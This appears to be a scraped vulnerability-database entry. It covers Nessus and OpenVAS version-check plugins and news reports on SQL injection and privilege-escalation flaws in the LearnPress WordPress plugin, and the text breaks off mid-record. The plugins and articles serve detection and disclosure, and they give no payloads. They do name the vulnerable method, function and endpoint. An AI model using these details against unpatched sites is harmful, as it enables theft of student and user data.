ID WORDPRESS_PLUGIN_LEARNPRESS_3_2_6_8.NASL Type nessus Reporter This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-05-13T00:00:00
Description
The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8 and, thus, is affected by multiple vulnerabilities :
A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)
A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function because the code does not check the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wp-admin/, to gain 'teacher' access to the application. (CVE-2020-11511)
Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
# Registration pass: when the scanner loads the plugin with `description` set, the
# metadata below is recorded and the script exits before the version check at the
# bottom of the file runs.
script_id(136191);
script_version("1.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/05/13");
script_cve_id("CVE-2020-6010", "CVE-2020-11511");
script_name(english:"WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote WordPress application has a plugin installed that is vulnerable to multiple vulnerabilities.");
# NOTE(review): the description text is what appears in the scan report. It spells the
# endpoint '/wpadmin/'; the other advisories for CVE-2020-11511 spell it '/wp-admin/'.
# Confirm before changing the string, since it is user-visible output.
script_set_attribute(attribute:"description", value:
"The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8
and, thus, is affected by multiple vulnerabilities :
- A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class
due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to
inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of
arbitrary data. (CVE-2020-6010)
- A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the
code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit
this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)
Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's
self-reported version number.");
# https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b38b6cba");
script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/learnpress/#developers");
script_set_attribute(attribute:"solution", value:
"Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.");
# The two scoring systems are sourced from different CVEs (see cvss_score_source /
# cvss3_score_source below): the CVSS2 vector (Au:N) reflects the unauthenticated
# privilege escalation CVE-2020-11511, while the CVSS3 vector (PR:L) reflects the
# authenticated SQLi CVE-2020-6010. Readers comparing the two should not expect them
# to describe the same issue.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-11511");
script_set_attribute(attribute:"cvss3_score_source", value:"CVE-2020-6010");
# Public exploits exist for these issues; the temporal vectors above (E:POC / E:P)
# state the same thing.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Vulnerability and patch were published on the same day; the detection plugin
# followed about a month later.
script_set_attribute(attribute:"vuln_publication_date", value:"2020/03/30");
script_set_attribute(attribute:"patch_publication_date", value:"2020/03/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/05/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
# The CPE is the WordPress core product, not the plugin; matching the plugin itself
# happens in the detection pass by plugin slug.
script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
script_end_attributes();
# Non-intrusive category: the check compares a detected version string and sends
# no exploit traffic, consistent with the note in the description.
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
# The detection pass depends on the plugin detector having already run and on a
# WordPress install and PHP having been recorded in the knowledge base.
script_dependencies("wordpress_plugin_detect.nbin");
script_require_keys("installed_sw/WordPress", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include('vcf.inc');
include('vcf_extras.inc');
# Detection pass: fetch the version the wordpress_plugin_detect dependency recorded
# for the 'learnpress' slug and compare it against the fixed release.
app_info = vcf::wordpress::plugin::get_app_info(plugin:'learnpress');

# A detected version with fewer than two dot-separated segments is too coarse to
# compare against a four-segment fix; the helper presumably audits out rather than
# guessing in that case.
vcf::check_granularity(app_info:app_info, sig_segments:2);

# Versions strictly below this value are reported as vulnerable.
# NOTE(review): the wpvulndb entry for CVE-2020-11511 on this page describes the
# plugin as affected "through 3.2.6.8" and the OpenVAS check on this page uses
# 3.2.6.9 as the fixed release, whereas the patchstack entries name 3.2.6.8 as the
# fix. Confirm the boundary against the vendor changelog before relying on a clean
# result for an installed 3.2.6.8.
fixed = '3.2.6.8';

# SECURITY_WARNING corresponds to the Medium severity shown for this plugin; the
# sqli flag marks the finding as injection-related in the report.
vcf::check_version_and_report(
  app_info:app_info,
  constraints:[ { 'fixed_version' : fixed } ],
  severity:SECURITY_WARNING,
  flags:{sqli:TRUE}
);
{"id": "WORDPRESS_PLUGIN_LEARNPRESS_3_2_6_8.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities", "description": "The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8 and, thus, is affected by multiple vulnerabilities :\n\n - A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "published": "2020-05-01T00:00:00", "modified": "2022-05-13T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/136191", "reporter": "This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b38b6cba", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11511", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6010", "https://wordpress.org/plugins/learnpress/#developers"], "cvelist": ["CVE-2020-11511", "CVE-2020-6010"], "immutableFields": [], "lastseen": "2022-05-15T13:47:27", "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-11511", "CVE-2020-6010"]}, {"type": "exploitdb", "idList": ["EDB-ID:50137", "EDB-ID:50138"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163536", "PACKETSTORM:163538"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1"]}, {"type": "thn", "idList": ["THN:047CA924D8DECEDDC49DB26C77A3339B"]}, {"type": "threatpost", "idList": ["THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB"]}, {"type": "wpexploit", "idList": ["WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335"]}, {"type": "zdt", "idList": ["1337DAY-ID-36565", "1337DAY-ID-36566"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-11511", "CVE-2020-6010"]}, {"type": "exploitdb", "idList": ["EDB-ID:50137", "EDB-ID:50138"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107443", "OPENVAS:1361412562310112737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163536", "PACKETSTORM:163538"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1"]}, {"type": "thn", "idList": ["THN:047CA924D8DECEDDC49DB26C77A3339B"]}, {"type": "threatpost", "idList": ["THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB"]}, 
{"type": "wpexploit", "idList": ["WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335"]}, {"type": "zdt", "idList": ["1337DAY-ID-36565", "1337DAY-ID-36566"]}]}, "exploitation": null, "vulnersScore": 6.9}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "136191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136191);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-6010\", \"CVE-2020-11511\");\n\n script_name(english:\"WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8\nand, thus, is affected by multiple vulnerabilities :\n\n - A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class\n due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to\n inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of\n arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the\n code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit\n this, via /wpadmin/, to gain 'teacher' access to the application. 
(CVE-2020-11511)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n # https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b38b6cba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/learnpress/#developers\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11511\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-6010\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'learnpress');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'fixed_version' : '3.2.6.8' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{sqli:TRUE});\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-11511", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-03-30T00:00:00", "vulnerabilityPublicationDate": "2020-03-30T00:00:00", "exploitableWith": []}
{"nessus": [{"lastseen": "2022-02-19T12:39:45", "description": "The WordPress LearnPress Plugin installed on the remote host is affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-14T00:00:00", "type": "nessus", "title": "LearnPress Plugin for WordPress < 3.2.6.9 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6010", "CVE-2020-11511"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*"], "id": "WEB_APPLICATION_SCANNING_112388", "href": "https://www.tenable.com/plugins/was/112388", "sourceData": "No source data", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-08T09:12:07", "description": "LearnPress plugin for WordPress is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-05T00:00:00", "type": "openvas", "title": "WordPress LearnPress Plugin < 3.2.6.9 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11510", "CVE-2020-6010", "CVE-2020-11511"], "modified": "2020-05-05T00:00:00", "id": 
"OPENVAS:1361412562310112737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112737", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112737\");\n script_version(\"2020-05-05T10:09:51+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:09:51 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-05 09:22:00 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-6010\", \"CVE-2020-11510\", \"CVE-2020-11511\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress LearnPress Plugin < 3.2.6.9 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"gb_wordpress_plugin_http_detect.nasl\");\n script_mandatory_keys(\"learnpress/detected\");\n\n script_tag(name:\"summary\", value:\"LearnPress plugin for WordPress is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - SQL injection (CVE-2020-6010)\n\n - Authenticated page creation and status modification (CVE-2020-11510)\n\n - Privilege escalation (CVE-2020-11511)\");\n\n script_tag(name:\"affected\", value:\"WordPress LearnPress plugin before version 3.2.6.9.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.2.6.9 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.wordfence.com/blog/2020/04/high-severity-vulnerabilities-patched-in-learnpress/\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:thimpress:learnpress\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! 
infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"3.2.6.9\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.6.9\", install_path: location );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:29", "description": "[](<https://thehackernews.com/images/-xJ7Dvr5LbDI/XqqdT_vNg7I/AAAAAAAAAR8/JIaPS--WdGweXDZLNMngwaB4_2S1Bid9ACLcBGAsYHQ/s728-e100/Online-Learning-WordPress-Plugin.jpg>)\n\nSecurity researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system ([LMS](<https://en.wikipedia.org/wiki/Learning_management_system>)) plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. \n \nAccording to the Check Point Research Team, the three WordPress plugins in question \u2014 [LearnPress](<https://wordpress.org/plugins/learnpress/>), [LearnDash](<https://www.learndash.com/>), and [LifterLMS](<https://wordpress.org/plugins/lifterlms/>) \u2014 have security flaws that could permit students, as well as unauthenticated users, to pilfer personal information of registered users and even attain teacher privileges. \n \n\"Because of coronavirus, we're doing everything from our homes, including our formal learning,\" [Check Point](<https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/>) Research's Omri Herscovici said. 
\"The vulnerabilities found allow students, and sometimes even unauthenticated users, to gain sensitive information or take control of the LMS platforms.\" \n \nThe three LMS systems are installed on approximately 100,000 different educational platforms, including major universities such as the University of Florida, the University of Michigan, and the University of Washington, among others. \n \nLearnPress and LifterLMS alone have been downloaded over 1.6 million times since their launch. \n \n\n\n## Multiple Vulnerabilities in WordPress LMS Plugins\n\n \nLMS facilitates online learning via a software application that lets academic institutions and employers create course curriculum, share coursework, enroll students, and evaluate students with quizzes. \n \nPlugins such as LearnPress, LearnDash, and LifterLMS make it easy by adapting any WordPress site to a fully functioning and easy-to-use LMS. \n \n\n\n[](<https://thehackernews.com/images/-0mYATefJFjo/Xqqdb-QKKOI/AAAAAAAAASA/U2OQ2qDfJtwCO6NdShwVxIrMESQFtLm2wCLcBGAsYHQ/s728-e100/hacking-code.jpg>)\n\n \nThe flaws in LearnPress range from [blind SQL injection](<https://owasp.org/www-community/attacks/Blind_SQL_Injection>) (CVE-2020-6010) to privilege escalation ([CVE-2020-11511](<https://www.wordfence.com/blog/2020/04/high-severity-vulnerabilities-patched-in-learnpress/>)), which can authorize an existing user to gain a teacher's role. \n \n\"Unexpectedly, the code doesn't check the permissions of the requesting user, therefore letting any student call this function,\" the researchers stated. \n \nLearnDash, likewise, suffers from a SQL injection flaw (CVE-2020-6009) that allows an adversary to craft a malicious SQL query by using PayPal's Instant Payment Notification ([IPN](<https://developer.paypal.com/developer/ipnSimulator/>)) message service simulator to trigger fake course enrollment transactions. 
\n \nLastly, LifterLMS's arbitrary file write vulnerability (CVE-2020-6008) exploits the dynamic nature of PHP applications to allow an attacker, e.g., a student registered for a specific course, to change their profile name to a malicious piece of PHP code. \n \nIn total, the flaws make it possible for attackers to steal personal information (names, emails, usernames, passwords, etc\u2026), and students to change grades, retrieve tests and test answers beforehand, and also forge certificates. \n \n\"The platforms involve payment; therefore, financial schemes are also applicable in the case of modifying the website without webmaster's information,\" the researchers warned. \n \nCheck Point Research said the vulnerabilities were discovered in March and were responsibly disclosed to the concerned platforms. All three LMS systems have since released patches to address the issues. \n \nIt's recommended that users upgrade to the latest versions of these plugins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T10:06:00", "type": "thn", "title": "Critical Bugs Found in 3 Popular e-Learning Plugins for WordPress Sites", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511", "CVE-2020-6008", "CVE-2020-6009", "CVE-2020-6010"], "modified": "2020-04-30T11:07:09", "id": "THN:047CA924D8DECEDDC49DB26C77A3339B", "href": "https://thehackernews.com/2020/04/wordpress-lms-plugins.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-08T22:34:47", "description": "Researchers have disclosed critical-severity flaws in three popular WordPress plugins used widely by colleges and universities: LearnPress, LearnDash and LifterLMS. The flaws, now patched, could allow students to steal personal information, change their grades, cheat on tests and more.\n\nThe vulnerable plugins have been installed on more than 130,000 school websites \u2014 including ones used the University of Florida, University of Michigan and University of Washington. Schools leverage these plugins as part of their learning management systems (LMS). LMS platforms, used to administer, track and organize coursework, are vital right now for schools quickly moving classrooms online during the coronavirus pandemic.\n\n[LearnPress](<https://wordpress.org/plugins/learnpress/>) is used on LMS platforms to create courses with quizzes and lessons for students, and has an install base of 80,000. [LearnDash](<https://www.learndash.com>) provides tools for selling online coursework, and is used by more than 33,000 websites. And, [LifterLMS](<https://wordpress.org/plugins/lifterlms/#developers>) provides sample course and quizzes, and is used by more than 17,000 websites.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe proved that hackers could easily take control of the entire e-learning platform. 
Top educational institutions, as well as many online academies, rely on the systems that we researched in order to run their entire online courses and training programs,\u201d Omri Herscovici, Check Point vulnerability research team leader, said in a Thursday analysis. \u201cThe vulnerabilities found allow students, and sometimes even unauthenticated users, to gain sensitive information or take control of the LMS platforms. We urge the relevant educational establishment everywhere to update to the latest versions of all the platforms.\u201d\n\nThe flaws range in seriousness and impact, but could allow third-party attackers to steal personal information (such as names, emails, usernames and passwords) or target the financial payment methods that are tied to the platforms. In addition, the flaws could have given students the ability to change the grades for themselves or their friends, retrieve tests before they are administered, escalate their privileges to those of a teacher and forge graduation certificates.\n\nThreatpost has reached out to LearnPress, LearnDash and LifterLMS for further comment.\n\n## **Technical Details **\n\nResearchers found the flaws in a span of two weeks during March. All vulnerabilities have since been reported to the plugins and patched.\n\nA time-based blind SQL injection vulnerability (CVE-2020-6010) exists in versions 3.2.6.7 and earlier of LearnPress, which researchers said \u201cis very trivial to identify and exploit.\u201d Specifically, the flaw exists in the method _get_items of the class LP_Modal_Search_Items. The method fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
This can be exploited by an authenticated attacker by merely specially crafted request to the /wp-admin/admin-ajax.php endpoint page.\n\nDoing so would \u201callow students and even unauthenticated users to retrieve the entire content of the database and steal personal information just like in any other compromised platform that has registered users (names, emails, usernames, passwords, etc\u2026),\u201d Herscovici told Threatpost. \u201cGetting the administrator hash and cracking it allows the attacker to get full control over the server.\u201d\n\nIn another flaw in LearnPress (CVE-2020-11511), the function learn_press_accept_become_a_teacher doesn\u2019t check the permissions of the requesting user \u2013 so anyone can call the function, whether they\u2019re a teacher or not. The privilege-escalation flaw can be leveraged by a student to upgrade to a teacher role \u2013 giving themselves access to grades, tests and more.\n\nIn versions earlier than 3.1.6 of LearnDash, researchers found an unauthenticated second order SQL injection (CVE-2020-6009), stemming from the ld-groups.php file. The file failed to sanitize user-suppled data before using it in an SQL query. Similar to CVE-2020-6010, this flaw enables attackers to access the entire content of the database and steal personal information. The flaw ranks [9.8 out of 10 on the CVSS scale,](<https://nvd.nist.gov/vuln/detail/CVE-2020-6009>) making it critical in severity.\n\nFinally, researchers found an arbitrary file-write flaw (CVE-2020-6008) in versions earlier than 3.37.15 of LifterLMS. The flaw exists due to the insufficient validation of files during file upload; remote attackers can leverage the flaw to execute code and effectively take over the learning platforms. 
This flaw ranks [9.8 out of 10 on the CVSS scale](<https://nvd.nist.gov/vuln/detail/CVE-2020-6008>), making it critical severity.\n\n\u201cThe SQL injection is very dangerous since it allows stealing the entire database of the website with all the information, including the admin\u2019s hashed password,\u201d Herscovici told Threatpost. \u201cBut the most dangerous one is the arbitrary file-write (CVE-2020-6008) which allows the attacker to upload any code of their own to the server, thus instantly achieving full remote code execution.\u201d\n\nThe flaws come as universities and colleges face unprecedented [remote-work security issues](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>), after having to send students home and set up courses online due to the [coronavirus pandemic](<https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/>).\n\nThe threat is not hypothetical: Previously uncovered malware campaigns have targeted the education industries, including one looking to compromise a [Canadian medical research university](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>). Other schools have been hit by [Zoom-bombing attacks](<https://threatpost.com/zoom-scrutinized-as-security-woes-mount/154305/>), where attackers hijack online classes using the Zoom platform to spew hateful messages or videos. And last week, researchers said several U.S. universities [were targeted in a widespread spear-phishing attack](<https://threatpost.com/us-universities-adult-dating-spear-phishing-attack/155170/>) that uses adult dating as a lure. In reality, the emails spread the Hupigon remote access trojan (RAT), known to be leveraged by state-sponsored threat actors.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. 
ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-04-30T10:00:32", "type": "threatpost", "title": "Critical WordPress e-Learning Plugin Bugs Open Door to Cheating", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11511", "CVE-2020-6008", "CVE-2020-6009", "CVE-2020-6010"], "modified": "2020-04-30T10:00:32", "id": "THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB", "href": 